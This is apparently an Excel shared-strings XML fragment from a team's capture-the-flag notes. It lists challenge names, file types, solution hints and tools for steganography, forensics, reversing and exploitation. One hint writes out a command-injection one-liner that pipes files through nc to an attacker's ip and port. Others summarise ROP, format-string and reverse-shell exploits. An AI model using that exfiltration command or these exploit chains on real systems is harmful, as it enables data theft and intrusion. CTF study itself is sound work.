    <t>decombile the apk there's a base 64 string in c0151b.java that is the flag</t>
  </si>
  <si>
    <t>write a scalpel config file and extract</t>
  </si>
  <si>
    <t>apktool, jadx, gd-gui</t>
  </si>
  <si>
    <t>binwalk, Scalpel File Carver</t>
  </si>
  <si>
    <t>What is this</t>
  </si>
  <si>
    <t>find the message in the two images</t>
  </si>
  <si>
    <t>xor the pictures together with stegsolve</t>
  </si>
  <si>
    <t>stegsolve</t>
  </si>
  <si>
    <t>a dough bee</t>
  </si>
  <si>
    <t>step through and rebuild algorithm, python script to solve found algorithm</t>
  </si>
  <si>
    <t>am-i-cheating</t>
  </si>
  <si>
    <t>different alphabet</t>
  </si>
  <si>
    <t>Strip ASCII from Stream, Split image, combine, write script to automate process</t>
  </si>
  <si>
    <t>python pil library</t>
  </si>
  <si>
    <t>crack-me-if-you-can</t>
  </si>
  <si>
    <t>.java</t>
  </si>
  <si>
    <t>lots of operands on strings</t>
  </si>
  <si>
    <t>apply all operations</t>
  </si>
  <si>
    <t>Data Extraction</t>
  </si>
  <si>
    <t>john-the-packer</t>
  </si>
  <si>
    <t>stolen files</t>
  </si>
  <si>
    <t>comparison done sequentially</t>
  </si>
  <si>
    <t>use PIN to count instructions and check if byte is valid or not</t>
  </si>
  <si>
    <t>Find stolen files using wireshark</t>
  </si>
  <si>
    <t>Saw this - 2</t>
  </si>
  <si>
    <t>retrieve the second flag</t>
  </si>
  <si>
    <t>GodMode</t>
  </si>
  <si>
    <t>.bmp picture</t>
  </si>
  <si>
    <t>LSB. R, G and B</t>
  </si>
  <si>
    <t>reversemeplz</t>
  </si>
  <si>
    <t>ROT13</t>
  </si>
  <si>
    <t>change input to account for rot13</t>
  </si>
  <si>
    <t>Shellc0de</t>
  </si>
  <si>
    <t>escape the jail</t>
  </si>
  <si>
    <t>Stuck inside a shellcode jail, execute your own to break out and get the flag</t>
  </si>
  <si>
    <t>trollface</t>
  </si>
  <si>
    <t>risc</t>
  </si>
  <si>
    <t>turn photo clockwise and use Stegsolve to see data</t>
  </si>
  <si>
    <t>open source CPU</t>
  </si>
  <si>
    <t>Stegsolve</t>
  </si>
  <si>
    <t>get emulator and run hidden file</t>
  </si>
  <si>
    <t>Blocks</t>
  </si>
  <si>
    <t>gcc-or1k-elf-4.8.1-x86_64.tar.bz2</t>
  </si>
  <si>
    <t>PNG</t>
  </si>
  <si>
    <t>Hidden flag in PNG file</t>
  </si>
  <si>
    <t>XOR Both images together using Python(crypto / forensics)</t>
  </si>
  <si>
    <t>Stegsolve.jar, picxoralpha.py</t>
  </si>
  <si>
    <t>XZ Archive</t>
  </si>
  <si>
    <t>Hidden flag in XZ Archive</t>
  </si>
  <si>
    <t>Unxz -&gt; un tar -&gt; open pcap -&gt; extract file from dump -&gt; run pcapfix</t>
  </si>
  <si>
    <t xml:space="preserve">wireshark, pcapfix </t>
  </si>
  <si>
    <t>Image</t>
  </si>
  <si>
    <t>NES Rom</t>
  </si>
  <si>
    <t>Find flag in NES rom</t>
  </si>
  <si>
    <t>pwnxy</t>
  </si>
  <si>
    <t>Unzip archive -&gt; Open ROM in NES emulator -&gt; Play to second level(forensics)</t>
  </si>
  <si>
    <t>blocky’s revenge</t>
  </si>
  <si>
    <t>unxz, any NES emulator</t>
  </si>
  <si>
    <t>game</t>
  </si>
  <si>
    <t>Here, kitty kitty</t>
  </si>
  <si>
    <t>.wav</t>
  </si>
  <si>
    <t>morse code</t>
  </si>
  <si>
    <t>transcsribe in game circuit to paper (https://docs.google.com/spreadsheets/d/17Cbg52OKEnkU7v5iOrxbVRN-GlODHMxH8V_JIrqnpgc/edit#gid=1443626110) then use Z3</t>
  </si>
  <si>
    <t>translate morse code</t>
  </si>
  <si>
    <t>the greatest</t>
  </si>
  <si>
    <t>gif</t>
  </si>
  <si>
    <t>email</t>
  </si>
  <si>
    <t>swap return arguments for inverse then gifshuffle</t>
  </si>
  <si>
    <t>gifshuffle</t>
  </si>
  <si>
    <t>windows forensics</t>
  </si>
  <si>
    <t>windows pagefile</t>
  </si>
  <si>
    <t>windows</t>
  </si>
  <si>
    <t>concat hexstrings</t>
  </si>
  <si>
    <t>YARA</t>
  </si>
  <si>
    <t>paying attention</t>
  </si>
  <si>
    <t>flag was shown on slides at main event</t>
  </si>
  <si>
    <t>Get the key.txt</t>
  </si>
  <si>
    <t>ext2</t>
  </si>
  <si>
    <t>lots of files</t>
  </si>
  <si>
    <t>mount file, grep key.txt</t>
  </si>
  <si>
    <t>QR(easy)</t>
  </si>
  <si>
    <t>qr code</t>
  </si>
  <si>
    <t>find patterns, run in ruby</t>
  </si>
  <si>
    <t>read it</t>
  </si>
  <si>
    <t>corel/wp</t>
  </si>
  <si>
    <t xml:space="preserve">password protected </t>
  </si>
  <si>
    <t>guess password seccon2014</t>
  </si>
  <si>
    <t>reverse it</t>
  </si>
  <si>
    <t>pirate’s treasure</t>
  </si>
  <si>
    <t>calcexec-1</t>
  </si>
  <si>
    <t>binary file</t>
  </si>
  <si>
    <t>reverse hexadeciaml representaion</t>
  </si>
  <si>
    <t>C#</t>
  </si>
  <si>
    <t>Gain access to the print flag function</t>
  </si>
  <si>
    <t>SECCON Wars: The Flag Awakens</t>
  </si>
  <si>
    <t>video</t>
  </si>
  <si>
    <t>Create an X509 auth certificate with two identical identifiers - this will cause an exception allowing you to craft your own certificate and load the function to print the flag (exploit)</t>
  </si>
  <si>
    <t>combine last line of pixels in frame of video</t>
  </si>
  <si>
    <t>shuffle</t>
  </si>
  <si>
    <t>hard coded values</t>
  </si>
  <si>
    <t>dll and pdb</t>
  </si>
  <si>
    <t>turn hard coded values in ascii strings</t>
  </si>
  <si>
    <t>decrypt rsa, generate key with python script</t>
  </si>
  <si>
    <t>bbos</t>
  </si>
  <si>
    <t>pwn adventure 3</t>
  </si>
  <si>
    <t>bat, i64</t>
  </si>
  <si>
    <t>login to blackberry phone</t>
  </si>
  <si>
    <t>password has a SHA 1 hash</t>
  </si>
  <si>
    <t>modify game code to allow player to retrieve flag in game</t>
  </si>
  <si>
    <t>radare2</t>
  </si>
  <si>
    <t>curlcore</t>
  </si>
  <si>
    <t>7 directorie with 45 files</t>
  </si>
  <si>
    <t>read the messages sent to the computer</t>
  </si>
  <si>
    <t>boxxy</t>
  </si>
  <si>
    <t>locate SSL master key (96 hex digits)</t>
  </si>
  <si>
    <t>3 x86 binaries</t>
  </si>
  <si>
    <t>wireshark, OpenSSL</t>
  </si>
  <si>
    <t>take over slave with sprintf overflow in check_len, python script</t>
  </si>
  <si>
    <t>giggles</t>
  </si>
  <si>
    <t>doge_stege</t>
  </si>
  <si>
    <t>calcexec-2</t>
  </si>
  <si>
    <t>function pointer, python script</t>
  </si>
  <si>
    <t>find the message in the image</t>
  </si>
  <si>
    <t>python script to modify the colormap</t>
  </si>
  <si>
    <t>zfs</t>
  </si>
  <si>
    <t>gitschat</t>
  </si>
  <si>
    <t>iso</t>
  </si>
  <si>
    <t>2 x86 binaries</t>
  </si>
  <si>
    <t>get the data off the drive</t>
  </si>
  <si>
    <t>race condition, python script</t>
  </si>
  <si>
    <t>USF Explorer Pro</t>
  </si>
  <si>
    <t>break out of the sandbox</t>
  </si>
  <si>
    <t>Defensive 100</t>
  </si>
  <si>
    <t xml:space="preserve">overwite /proc/self/mem using a nop-sled with shellcode to break out of the sandbox </t>
  </si>
  <si>
    <t>prying-ears</t>
  </si>
  <si>
    <t>PCAP</t>
  </si>
  <si>
    <t>Given PCAP find flag</t>
  </si>
  <si>
    <t>Binary is just a dropper for an encrypted payload. Execute the dropper in a debugger to grab the payload then execute the payload on bare metal to get the flag (or patch the VM check in the binary)</t>
  </si>
  <si>
    <t>Unarchive XZ -&gt; Inspect Traffic in Wireshark -&gt; Extract PNG</t>
  </si>
  <si>
    <t>Hopper, Ida, Radare2, pwntools</t>
  </si>
  <si>
    <t>p7zip, wireshark, xxd</t>
  </si>
  <si>
    <t>defensive 200</t>
  </si>
  <si>
    <t>X86 EXE</t>
  </si>
  <si>
    <t>random image</t>
  </si>
  <si>
    <t>PNG Image</t>
  </si>
  <si>
    <t xml:space="preserve">Connect to Trend Micro Server with user agent TMCTF2015-13106 and cookie set to 'get_cookie("g1v3m3k3y=1")' and make a GET request to Trend Micro page to retrieve the necessary key buffer needed to execute the binary </t>
  </si>
  <si>
    <t>Find Flag in PNG image</t>
  </si>
  <si>
    <t>Buteforce XOR encoding using Py</t>
  </si>
  <si>
    <t>offensive 200</t>
  </si>
  <si>
    <t>sound zoo</t>
  </si>
  <si>
    <t>Used Xposed Android Framwork to hook into the primary methods and control execution flow.</t>
  </si>
  <si>
    <t>Xposed Android Framework, Genymotion, Jd-gui, XPosed, Android Visual Studio</t>
  </si>
  <si>
    <t>Mp3 file</t>
  </si>
  <si>
    <t>Find Flag in Mp3 file</t>
  </si>
  <si>
    <t xml:space="preserve">Extract XZ -&gt; Extract Tar -&gt; Inspect Mp3 -&gt; Speed Mp3 up </t>
  </si>
  <si>
    <t>png2ppm</t>
  </si>
  <si>
    <t>spy paper</t>
  </si>
  <si>
    <t>upload malicious code to exploit the binary</t>
  </si>
  <si>
    <t>JPEG</t>
  </si>
  <si>
    <t>Find Flag in JPEG</t>
  </si>
  <si>
    <t>Decode dot matrix hidden in image</t>
  </si>
  <si>
    <t>Gimp,  https://w2.eff.org/Privacy/printers/docucolor/</t>
  </si>
  <si>
    <t xml:space="preserve">Custom craft a PNG image that will leak the stack cookies. From there it's a matter of leaking a proper LIBC address and building the appropriate ROP chain using a PNG images zlib data section </t>
  </si>
  <si>
    <t>counter</t>
  </si>
  <si>
    <t xml:space="preserve">Strange </t>
  </si>
  <si>
    <t>Very Large Integer</t>
  </si>
  <si>
    <t>Given a very large integer find the flag</t>
  </si>
  <si>
    <t>count the number of instructions executed with python scirpt</t>
  </si>
  <si>
    <t>Convert Big Int to Hex -&gt; Unarchive 7z-&gt; Extract Lzo -&gt; Decode UUEncoding -&gt; Convert Hex to Binary -&gt; Decode bin</t>
  </si>
  <si>
    <t>pintool</t>
  </si>
  <si>
    <t>File Signature Table: http://www.garykessler.net/library/file_sigs.html, LZO Compression, UUEncoding</t>
  </si>
  <si>
    <t>malware</t>
  </si>
  <si>
    <t>toq-toq</t>
  </si>
  <si>
    <t>PCAP File</t>
  </si>
  <si>
    <t>Byte-compiled python</t>
  </si>
  <si>
    <t>Find flag in PCAP file</t>
  </si>
  <si>
    <t>Write port knocking py script to get served the flag.</t>
  </si>
  <si>
    <t>Port Knocking: https://en.wikipedia.org/wiki/Port_knocking</t>
  </si>
  <si>
    <t>dump content of files to port being monitored, view raw url as link of tweet</t>
  </si>
  <si>
    <t>Tortureous Sound</t>
  </si>
  <si>
    <t>easy python decomiler http://sourceforge.net/projects/easypythondecompiler/</t>
  </si>
  <si>
    <t xml:space="preserve">MPEG </t>
  </si>
  <si>
    <t>Flag hidden in MPEG</t>
  </si>
  <si>
    <t>Use SSTV program to grab QR -&gt; Place QR in correct order-&gt; Scan -&gt; Get Flag</t>
  </si>
  <si>
    <t xml:space="preserve">RX-SSTV, </t>
  </si>
  <si>
    <t xml:space="preserve">White Noise </t>
  </si>
  <si>
    <t>Find Flag hidden in PNG</t>
  </si>
  <si>
    <t>Use py script to inspect RGB values of image to reveal scatter plot coordinates</t>
  </si>
  <si>
    <t>rev300</t>
  </si>
  <si>
    <t>SuperH ELF</t>
  </si>
  <si>
    <t>use LD_PRELOAD to hook sprintf function to dump the flag while running</t>
  </si>
  <si>
    <t>SuperH Linux emulator, gdb</t>
  </si>
  <si>
    <t>rev500</t>
  </si>
  <si>
    <t>vbox</t>
  </si>
  <si>
    <t>must solve crypt300 first, use vitualbox OS debugger, replace jmp instruction</t>
  </si>
  <si>
    <t>pnginfo</t>
  </si>
  <si>
    <t>virtualbox, gdb</t>
  </si>
  <si>
    <t>shop-1</t>
  </si>
  <si>
    <t>miscellaneous 200</t>
  </si>
  <si>
    <t>leak the password</t>
  </si>
  <si>
    <t>.txt file</t>
  </si>
  <si>
    <t>.NET</t>
  </si>
  <si>
    <t>Convert text values to PPM format, then convert to PNG (forensics)</t>
  </si>
  <si>
    <t>Convert text to image (forensics)</t>
  </si>
  <si>
    <t>patch binary with python script</t>
  </si>
  <si>
    <t>authentication is done using memcmp C function. It is possible to leak the return value of the admin password if username / password are not null terminated</t>
  </si>
  <si>
    <t>linux command: 'wc', http://netpbm.sourceforge.net/doc/ppm.html</t>
  </si>
  <si>
    <t>Telerik JustDecompile http://www.telerik.com/products/decompiler.aspx</t>
  </si>
  <si>
    <t>babypwn</t>
  </si>
  <si>
    <t>miscellaneous 300</t>
  </si>
  <si>
    <t>python script , choose address of fflush callback to overwrite EIP</t>
  </si>
  <si>
    <t>write script to recursively crack .zip files using fcrackzip -&gt; analyse the .wav in audio program (forensics)</t>
  </si>
  <si>
    <t>Audacity, fcrackzip</t>
  </si>
  <si>
    <t>detent</t>
  </si>
  <si>
    <t>interprets each character as a command</t>
  </si>
  <si>
    <t>recon 100</t>
  </si>
  <si>
    <t>determine command for each letter</t>
  </si>
  <si>
    <t>Find Hidden Flag</t>
  </si>
  <si>
    <t>shop-2</t>
  </si>
  <si>
    <t>Dark</t>
  </si>
  <si>
    <t>Flag hidden on Francis Alexander's website -&gt; Use web dev tools to find the flag in the html comments (forensics)</t>
  </si>
  <si>
    <t>Leak the base libc address using the previous vunerability, then jump to system by way of a use-after-free vuln</t>
  </si>
  <si>
    <t xml:space="preserve">Run the algorithm in reverse to retrieve the proper encoding </t>
  </si>
  <si>
    <t>recon 200</t>
  </si>
  <si>
    <t>flag visible in commit on GitHub (forensics)</t>
  </si>
  <si>
    <t>reversing 400</t>
  </si>
  <si>
    <t>DD-WRT Firmware</t>
  </si>
  <si>
    <t>Given DD-WRT Bin find flag</t>
  </si>
  <si>
    <t>Use Firmware Mod Kit to extract DD-WRT Firmware -&gt; Flag is located under rootfs/etc/www (Forensics)</t>
  </si>
  <si>
    <t>Firmware Mod Kit: https://code.google.com/archive/p/firmware-mod-kit/, binwalk</t>
  </si>
  <si>
    <t>KeyLead</t>
  </si>
  <si>
    <t>ECTF Hacked?</t>
  </si>
  <si>
    <t>Apache Logs</t>
  </si>
  <si>
    <t>Find the clue in the apache logs</t>
  </si>
  <si>
    <t>Analyse Apache server logs to find code -&gt; submit timestamp to automated online bot (Forensics)</t>
  </si>
  <si>
    <t xml:space="preserve">NOP the victory condition checks to get the flag </t>
  </si>
  <si>
    <t>eight cats hid the flag</t>
  </si>
  <si>
    <t>Flag hidden on github</t>
  </si>
  <si>
    <t>Find CTF Organizers github -&gt; ectract ctf repo -&gt; find flag in commits(Recon)</t>
  </si>
  <si>
    <t>H4cker message</t>
  </si>
  <si>
    <t>sniff3r</t>
  </si>
  <si>
    <t xml:space="preserve">PCAP </t>
  </si>
  <si>
    <t>Find flag in network traffic</t>
  </si>
  <si>
    <t>Analyse PCAP file to find FTP traffic transmitting a PNG(Forensics)</t>
  </si>
  <si>
    <t>Help Bob!</t>
  </si>
  <si>
    <t>Various Files</t>
  </si>
  <si>
    <t>Bobs having trouble finding his flag</t>
  </si>
  <si>
    <t>Use JTR to crack shadow file then crack firefox accounts(Forensics)</t>
  </si>
  <si>
    <t xml:space="preserve">icmp handler contains info leak via format string , TCP handler has buffer overflow allowing for pointer modification. leak pointers to libc using format string, overwrite username pointer with the address of strstr in .got. then overwrite strstr got entry via the address of system in libc. then read the flag using './flag' </t>
  </si>
  <si>
    <t>leach</t>
  </si>
  <si>
    <t xml:space="preserve">Patch the part of the program that plays pong to get the flag </t>
  </si>
  <si>
    <t>IDA, Hopper, Radare2, Ht Tools</t>
  </si>
  <si>
    <t>Selfie</t>
  </si>
  <si>
    <t>ultra-compression</t>
  </si>
  <si>
    <t xml:space="preserve">First part of the flag is printed through normal execution. The second part of the flag is actually hidden in a second executable embedded in the first. Extract the buffer and iterate over it in its entirety testing the index against a ported version of the sitoor function </t>
  </si>
  <si>
    <t>bash commands</t>
  </si>
  <si>
    <t>leak the flag</t>
  </si>
  <si>
    <t>blind command injection, set up your host to listen to a port and inject a command. use 'find .. -iname '*gz'|xargs cat|nc ip port' to dump the source which contains the flag (exploit)</t>
  </si>
  <si>
    <t>Meet the Team</t>
  </si>
  <si>
    <t>Can you find the ctf organizers blog?</t>
  </si>
  <si>
    <t>Find the ctf organizers blog (Forensics)</t>
  </si>
  <si>
    <t>pixel-princess</t>
  </si>
  <si>
    <t>.JPG</t>
  </si>
  <si>
    <t>Find the flag in this JPG</t>
  </si>
  <si>
    <t>Second .jpg hidden in first image contains the flag that you must use steghide on</t>
  </si>
  <si>
    <t>http://steghide.sourceforge.net/</t>
  </si>
  <si>
    <t>Tera</t>
  </si>
  <si>
    <t xml:space="preserve">Binary tries to download incredibly large file, use curl to forge an http header to grab the necessary data at the offsets required </t>
  </si>
  <si>
    <t>g8la</t>
  </si>
  <si>
    <t>quarantine</t>
  </si>
  <si>
    <t>tcp stream</t>
  </si>
  <si>
    <t>defeat the binary</t>
  </si>
  <si>
    <t>use jacktheripper to crack password</t>
  </si>
  <si>
    <t>very advanced use after free vunlerability, required you defeate ASan and other protection methods</t>
  </si>
  <si>
    <t>jspuzzle</t>
  </si>
  <si>
    <t>alert(1)</t>
  </si>
  <si>
    <t>fix javascript</t>
  </si>
  <si>
    <t>d-tune</t>
  </si>
  <si>
    <t>Find the flag in the .wav file</t>
  </si>
  <si>
    <t>Audio file is dial tones -&gt; Analyse the numbers dialed -&gt; convert numbers dialed info flag using phone dpad</t>
  </si>
  <si>
    <t>fake</t>
  </si>
  <si>
    <t>poor writeup, however it appears you simply need to bruteforce the magic integer to get the flag (reversing)</t>
  </si>
  <si>
    <t>quine</t>
  </si>
  <si>
    <t>Send a message that decodes to ROP, then a sequence of copies that smashes the buffer, then a copy operation that overwrites the next few instructions with the quiny bit (pwn)</t>
  </si>
  <si>
    <t>license</t>
  </si>
  <si>
    <t>program requires a keyfile that follows a specific format: File size must be 34 bytes, must contain 5 newlines, the file contents must be separted with newline and each line must contain 6 bytes which will be compared after XORing with a hard coded XOR key (reversing)</t>
  </si>
  <si>
    <t>Mircrosoft Z3 Solver</t>
  </si>
  <si>
    <t>hacking time</t>
  </si>
  <si>
    <t>T_1000</t>
  </si>
  <si>
    <t>T_1000 was a IRC bot who linked to a twitter account -&gt; Running some commands found on the twitter account gave flag (forensics / misc)</t>
  </si>
  <si>
    <t>linux command: grep</t>
  </si>
  <si>
    <t>Reverse engineer the password checking logic and write the system then have Z3 solve it (reversing)</t>
  </si>
  <si>
    <t>we hate engineering</t>
  </si>
  <si>
    <t>.wav file</t>
  </si>
  <si>
    <t>reverse audio stream to hear flag</t>
  </si>
  <si>
    <t>Dont Panic! Shift Keying!</t>
  </si>
  <si>
    <t xml:space="preserve">.jpeg </t>
  </si>
  <si>
    <t>Given picture and text, get the flag</t>
  </si>
  <si>
    <t>Program the operations given into GNU Radio to get the flag.</t>
  </si>
  <si>
    <t>GNU Radio</t>
  </si>
  <si>
    <t>STEGOsaurus</t>
  </si>
  <si>
    <t>.mp3 audio</t>
  </si>
  <si>
    <t>Analyse the waveform, remove the louder waveform to reveal morose code pattern (forensics)</t>
  </si>
  <si>
    <t>audacity, sonic-visuliser</t>
  </si>
  <si>
    <t>so easy</t>
  </si>
  <si>
    <t>Pneumotoulthamicrescopicfilicoloaganiconissis</t>
  </si>
  <si>
    <t>word is spelled wrong</t>
  </si>
  <si>
    <t>grab the right password</t>
  </si>
  <si>
    <t>Place a breakpoint at 0x804877c and print out the value of EDX - Also, your input is case inverted</t>
  </si>
  <si>
    <t>gdb, peda, hopper.. ect</t>
  </si>
  <si>
    <t>Find da Key</t>
  </si>
  <si>
    <t>ftp-1</t>
  </si>
  <si>
    <t>precision</t>
  </si>
  <si>
    <t>execute your shellcode</t>
  </si>
  <si>
    <t xml:space="preserve">Stackoverflow that passes a primitive stack cookie and your shellcode must pass the isoc99_scanf </t>
  </si>
  <si>
    <t>wyvern</t>
  </si>
  <si>
    <t xml:space="preserve">use all-fuzz to analyze all possible execution paths then analyze the dumps </t>
  </si>
  <si>
    <t xml:space="preserve">understand base 64 encoding to restore padding to original message </t>
  </si>
  <si>
    <t>https://tools.ietf.org/html/rfc4648</t>
  </si>
  <si>
    <t>Nviso Vault</t>
  </si>
  <si>
    <t>.apk</t>
  </si>
  <si>
    <t>puzzle</t>
  </si>
  <si>
    <t>install the application using 'adb install -r NvisionVault.apk' . Get the PID and then run Strace against the application which will print the flag</t>
  </si>
  <si>
    <t>piece together 100 pictures</t>
  </si>
  <si>
    <t>puzzle image together with photoshop and calculations function</t>
  </si>
  <si>
    <t>photoshop</t>
  </si>
  <si>
    <t>tarmful</t>
  </si>
  <si>
    <t>contacts</t>
  </si>
  <si>
    <t>tar files</t>
  </si>
  <si>
    <t>layers</t>
  </si>
  <si>
    <t>exploit the program</t>
  </si>
  <si>
    <t>unzip all the layers</t>
  </si>
  <si>
    <t>blind format string vunerability</t>
  </si>
  <si>
    <t>forensics100</t>
  </si>
  <si>
    <t>dmp</t>
  </si>
  <si>
    <t>strings the file which gives username and password</t>
  </si>
  <si>
    <t>openvpn</t>
  </si>
  <si>
    <t>forensics200</t>
  </si>
  <si>
    <t>MongoDB</t>
  </si>
  <si>
    <t>corrupted</t>
  </si>
  <si>
    <t>fix using purplebeard</t>
  </si>
  <si>
    <t>purplebeard</t>
  </si>
  <si>
    <t>ftp-2</t>
  </si>
  <si>
    <t>Reverse That App</t>
  </si>
  <si>
    <t>forensics400</t>
  </si>
  <si>
    <t>exploit the ftp service</t>
  </si>
  <si>
    <t>decompile the apk and find the flag under src\com\fake\site\sms\sms.java</t>
  </si>
  <si>
    <t>upload a file greater than 512 bytes to overwrite stack data and then download the flag (pwn)</t>
  </si>
  <si>
    <t>hexdump to 200 images</t>
  </si>
  <si>
    <t>Microsoft Z3 Problem Solver</t>
  </si>
  <si>
    <t>python script to convert text representation to binary</t>
  </si>
  <si>
    <t>bad smell php script, hexdump</t>
  </si>
  <si>
    <t>swappage</t>
  </si>
  <si>
    <t>pcappng</t>
  </si>
  <si>
    <t>decode the given base64 id. The resulting output is pythons pickle format wich will deseralize the pickle into pythons PREVIOUS number generation algorihtm Wichmann - Hill. Answer is 729</t>
  </si>
  <si>
    <t>extract the flag from the pcap</t>
  </si>
  <si>
    <t>wireshark, tcprewrite</t>
  </si>
  <si>
    <t>treasure</t>
  </si>
  <si>
    <t>autobots</t>
  </si>
  <si>
    <t>extract and identify tresure</t>
  </si>
  <si>
    <t>one line of shell code, get QR code</t>
  </si>
  <si>
    <t>execute a reverse shell</t>
  </si>
  <si>
    <t>leak libc base address to gain access to ROP gadgets. Then execute a reverse shell to retrieve the contents of the flag (pwn)</t>
  </si>
  <si>
    <t>x-y-z</t>
  </si>
  <si>
    <t>gps coordinates</t>
  </si>
  <si>
    <t>plot coordinates</t>
  </si>
  <si>
    <t>matplotlib</t>
  </si>
  <si>
    <t>misc300</t>
  </si>
  <si>
    <t>bluetooth dump</t>
  </si>
  <si>
    <t>bluetooth</t>
  </si>
  <si>
    <t>meme shop</t>
  </si>
  <si>
    <t xml:space="preserve">Ruby </t>
  </si>
  <si>
    <t>exploit the shop</t>
  </si>
  <si>
    <t>First you must leak the backend script from the web server. Then make 256 small memes, then a skeletal, pass your rop and call the checkout function</t>
  </si>
  <si>
    <t>run through program then listen to files</t>
  </si>
  <si>
    <t>Frontline ComProbe Protocol Analysis System 14.1.2072.2466</t>
  </si>
  <si>
    <t>Reverse That Binary</t>
  </si>
  <si>
    <t xml:space="preserve">password is hardcoded in the binary, use strings. </t>
  </si>
  <si>
    <t>fast and furious</t>
  </si>
  <si>
    <t>apk</t>
  </si>
  <si>
    <t>decompile code and find the hardcoded string, convert hex to ASCII and decode base 64</t>
  </si>
  <si>
    <t>hackerz</t>
  </si>
  <si>
    <t>boombox</t>
  </si>
  <si>
    <t>recon100</t>
  </si>
  <si>
    <t>decompile code and find the hardcoded string, decode base 64</t>
  </si>
  <si>
    <t>find image</t>
  </si>
  <si>
    <t>GDB remote debugging</t>
  </si>
  <si>
    <t>google images</t>
  </si>
  <si>
    <t>ToC/ToU timing attack, possible to cause intergeroverflow which leads to heap smashing</t>
  </si>
  <si>
    <t>python script to get message and key, XOR them together</t>
  </si>
  <si>
    <t>hopper, ida, radare2</t>
  </si>
  <si>
    <t>recon200</t>
  </si>
  <si>
    <t>find where camera was stolen</t>
  </si>
  <si>
    <t>log on to friends account to find google maps location</t>
  </si>
  <si>
    <t>individual elebin</t>
  </si>
  <si>
    <t>11 ELF binaries of different types</t>
  </si>
  <si>
    <t>recon400</t>
  </si>
  <si>
    <t>need a GNU cross-compiler, use cross-compiler from link, combine output for flag</t>
  </si>
  <si>
    <t>http://kozos.jp/vmimage/burning-asm.html</t>
  </si>
  <si>
    <t>address</t>
  </si>
  <si>
    <t>name of owner of house that tag is at</t>
  </si>
  <si>
    <t>credit card</t>
  </si>
  <si>
    <t>find digits reading magnetic track turning binary to numbers</t>
  </si>
  <si>
    <t>Note: this problem would be extremely difficult if this team hadn't built a cross-compiler in the past</t>
  </si>
  <si>
    <t>stego100</t>
  </si>
  <si>
    <t>8 frames</t>
  </si>
  <si>
    <t>build differences image, binary is encoded ascii</t>
  </si>
  <si>
    <t>reverse engineering android apk 1</t>
  </si>
  <si>
    <t>search for method showMessageTask, evaluate expresion and print in XPosed log running in emulator</t>
  </si>
  <si>
    <t>Genymotion, Jd-gui, XPosed, Android visual studio</t>
  </si>
  <si>
    <t>reverse engineering hardware 1</t>
  </si>
  <si>
    <t>draw out the circuit and solve with python script</t>
  </si>
  <si>
    <t>StringIPC</t>
  </si>
  <si>
    <t>pin placement of hardware (http://qiita.com/aryoa/items/3f6d82b8c63761cef087), D-Type flip flop (http://www.marutsu.co.jp/contents/shop/marutsu/datasheet/TC74HC74A.pdf)</t>
  </si>
  <si>
    <t>the</t>
  </si>
  <si>
    <t>X64 Linux - Kernel</t>
  </si>
  <si>
    <t>.pcap file</t>
  </si>
  <si>
    <t>reverse engineering hardware 2</t>
  </si>
  <si>
    <t>exploit the kernel</t>
  </si>
  <si>
    <t>There's some data exfiltration going on in this pcap. Can you figure you what happened?</t>
  </si>
  <si>
    <t xml:space="preserve">integer underflow allows you to enable kernal flags....Beyond that I don't understand any of the words on this page </t>
  </si>
  <si>
    <t>python script to decode GPIO cicuit generated values</t>
  </si>
  <si>
    <t>decode it</t>
  </si>
  <si>
    <t xml:space="preserve">arm </t>
  </si>
  <si>
    <t>password</t>
  </si>
  <si>
    <t>memcmp, set breakpoit and find what it is looking for. give base64 version</t>
  </si>
  <si>
    <t>ekogift</t>
  </si>
  <si>
    <t>open in hopper, follow refernce to flag then convert hex to characters</t>
  </si>
  <si>
    <t>mov</t>
  </si>
  <si>
    <t>use strings command</t>
  </si>
  <si>
    <t>Dump downloaded files from pcap -&gt; reverse .bin -&gt; pull shellcode from .bin -&gt; analyze shellcode -&gt; run shellcode to dump flag (Forensics)</t>
  </si>
  <si>
    <t>strace, ltrace, wireshark, http://lxr.free-electrons.com/source/Documentation/crypto/crypto-API-userspace.txt?v=3.19</t>
  </si>
  <si>
    <t>reversing the apc cache</t>
  </si>
  <si>
    <t>Illegal Radio</t>
  </si>
  <si>
    <t>.Flac audio</t>
  </si>
  <si>
    <t>We capured an illegal radio transmission, tell us what they're up to</t>
  </si>
  <si>
    <t xml:space="preserve">Python script to dump RDS band then analyze the state of the waveform </t>
  </si>
  <si>
    <t>brute force the randomization</t>
  </si>
  <si>
    <t>Just No One</t>
  </si>
  <si>
    <t>i like to move it</t>
  </si>
  <si>
    <t>Can you read?</t>
  </si>
  <si>
    <t>Read the EULA</t>
  </si>
  <si>
    <t>movuscated binary</t>
  </si>
  <si>
    <t>python pintool</t>
  </si>
  <si>
    <t>Make Similar</t>
  </si>
  <si>
    <t>crackme</t>
  </si>
  <si>
    <t>.ogg audio</t>
  </si>
  <si>
    <t>Listen carefully and try to figure out</t>
  </si>
  <si>
    <t>letslearndebugging</t>
  </si>
  <si>
    <t xml:space="preserve">Use Multimode to decode .ogg audio into weatherfax , Weatherfax dump contains xxd encoded messages, upon decoding a python script can be dumped that contains the flag </t>
  </si>
  <si>
    <t>use gdb to skip over sleep functions</t>
  </si>
  <si>
    <t>LD_PRELOAD to crack the checksum function and bruteforce the password</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/Radiofax , http://www.blackcatsystems.com/software/multimode/fax.html#HOWREC , http://www.webutils.pl/XXencode , https://en.wikipedia.org/wiki/Xxencoding</t>
  </si>
  <si>
    <t>andSoOn</t>
  </si>
  <si>
    <t>Out there</t>
  </si>
  <si>
    <t>PE32</t>
  </si>
  <si>
    <t>Find flag given mysterious address</t>
  </si>
  <si>
    <t xml:space="preserve">Search Database for full Ipv6 address, veiw page source to get flag. </t>
  </si>
  <si>
    <t>find numbers to solve binary, then find the sequence the numbers used, feynman point</t>
  </si>
  <si>
    <t>Welcome to Forensics</t>
  </si>
  <si>
    <t>.bin</t>
  </si>
  <si>
    <t>Fooddb</t>
  </si>
  <si>
    <t>Find the hidden data in the given .bin</t>
  </si>
  <si>
    <t>c++</t>
  </si>
  <si>
    <t>python script to exploit double free</t>
  </si>
  <si>
    <t xml:space="preserve">Realise the binary file is actually PHP code -&gt; Dump the variables </t>
  </si>
  <si>
    <t>Xdebug, Microsoft Z3</t>
  </si>
  <si>
    <t>https://github.com/Z3Prover/z3</t>
  </si>
  <si>
    <t>readable</t>
  </si>
  <si>
    <t>generate rop chain to get into shell, python script exploiting syscall</t>
  </si>
  <si>
    <t>npc</t>
  </si>
  <si>
    <t>https://xdebug.org/</t>
  </si>
  <si>
    <t>decompile and follow the logic, solve Nurikabe puzzle</t>
